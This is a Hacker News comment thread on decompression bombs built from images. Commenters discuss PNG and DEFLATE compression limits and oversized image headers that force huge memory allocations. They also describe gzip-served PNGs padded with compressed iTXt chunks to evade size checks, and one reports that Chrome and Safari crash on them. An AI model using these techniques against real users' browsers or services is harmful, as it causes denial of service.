Hacker Newsnew | past | comments | ask | show | jobs | submitlogin

I don't think you can do it with Jpeg, but you could probably do it with PNG which is basically using the same compression algorithm as zip.


There are some stupid tricks you can pull with image formats like emitting the headers for a gigantic image without including enough image data to actually encode the whole image. Most decoders will try to allocate a buffer up front (possibly as much as 16 GB for a 65535x65535 image!) before discovering that the image is truncated.

The same trick works with PNG, actually. Possibly even better: it uses a pair of 32-bit integers for the resolution.


Deflate allows a maximum compression ratio of 1000:1 or thereabouts.

Considering I’ve seen real world JPEGs above 300:1 (https://eoimages.gsfc.nasa.gov/images/imagerecords/73000/739...) I would not be surprised if you could craft a jpeg getting very close to or exceeding 4 digits.


The reason it doesn't work with JPEG is JPEG isn't a description of individual pixels but rather how you'd calculate what the individual pixel should be. That's part of the reason you can progressively load jpeg data.

PNG is actually a description of the RGB value for the individual pixels. That's why I believe you could png bomb, you could have a 2 billion by 2 billion black pixel image which would ultimately eat up a bunch of space in your GPU and memory to decode.

Perhaps something similar is possible with a JPEG, but it's really nothing to do with the compression info. JPEGs have a max size of 65,535×65,535, which would keep you from exploding them.


DEFLATE can only obtain a best-case compression ratio approaching 1032:1. (Put the byte to repeat in a preceding block, and set "0" = 256 and "1" = 285 for the literal/length code and "0" = 0 for the distance code. Then "10" will output 258 bytes.) This means a 2 Gpx × 2 Gpx PNG image will still be at least ~3.875 PB.

If you send it compressed over the wire, you could get another factor of 1032, or perhaps more depending on which algorithms the client supports. Also, you could generate it on demand as a data stream. Bit these run the risk of the client stopping the transfer before ever trying to process the image.


You can with PNG, but you have to set a high pixel resolution and most viewers have hard limits before it gets too crazy.


Is there a reason the malicious part of the payload has to be pixels? You could have a 100x100px image with 000s of 2GB iTXt chunks, no? That would bypass naive header checks that only reject based on canvas size.


You'd probably do zTxt chunks right? But regardless I'd guess that there's nothing that would cause a renderer to actually read that chunk.


The iTXt chunk can also be compressed <https://www.w3.org/TR/png/#10CompressionOtherUses>.


Ah yes, that makes sense.

However, it may work with the article's process - a 100x100 png with lots of 2GB-of-nothing iTXt chunks could be gzipped and served with `Content-Encoding: gzip` - so it would pass the "is a valid png" and "not pixel-huge image" checks but still require decompression in order to view it.


Firefox seems to handle this correctly: it reads the first part of the image and displays the image, but stops decompressing after the full image file is read

Chrome and Safari both crash after using up all OS memory on the task (Safari crashes earlier and not as badly because it has a per-page memory limit)




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: